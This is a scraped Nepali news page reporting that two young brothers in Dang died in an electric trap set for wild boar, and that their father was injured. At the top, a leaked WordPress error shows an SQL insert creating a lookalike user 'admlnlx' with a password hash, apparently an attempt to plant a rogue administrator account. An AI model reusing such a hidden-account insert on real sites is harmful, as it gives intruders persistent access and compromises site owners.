WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bwrh1VlxfGRHTMuV4OMs7lv9H9BhKk1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 13:13:22', '', 'admlnlx', 'admlnlx')

बँदेललाई थापेको विद्युतीय धरापमा परेर दाजुभाइको मृत्यु, बुबा घाइते – Gaule Khabar

बँदेललाई थापेको विद्युतीय धरापमा परेर दाजुभाइको मृत्यु, बुबा घाइते

बँदेललाई थापेको विद्युतीय धरापमा परेर दाजुभाइको मृत्यु, बुबा घाइते

गाउँले न्युज, काठमाण्डौ । दाङमा करेन्ट लागेर दुई दाजुभाइको मृत्यु भएको छ । जिल्ला प्रहरी कार्यालयका अनुसार घोराही उपमहानगरपालिका– १ हर्नोक निवासी १४ वर्षीय वीरबहादुर रावत र उनको १० वर्षीय भाइ तेजबहादुरको मकैबारीमा जंगली बँदेल मार्नका लागि थापिएको विद्युतीय धरापमा परेर सोमबार मृत्यु भएको हो ।

बँदेलले मकै सखाप पार्न थालेपछि त्यसलाई मार्न र धपाउनका लागि बारीमा विद्युत् लगिएको थियो । थापिएको विद्युतको धरापमा बँदेल परेको छ कि भनेर बिहान बारीमा गएका भाइलाई करेन्ट लागेपछि छुटाउन जाँदा दुवैलाई करेन्ट लागेको प्रहरीले बताएको छ ।
छोरालाई करेन्ट लागेको देखेपछि बारीमा गएका उनका ३७ वर्षीय बुबा दिलबहादुरलाई पनि करेन्ट लाग्दा घाइते भएको प्रहरीले बताए । उनको राप्ती स्वास्थ्य विज्ञान प्रतिष्ठान घोराहीमा उपचार भइरहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका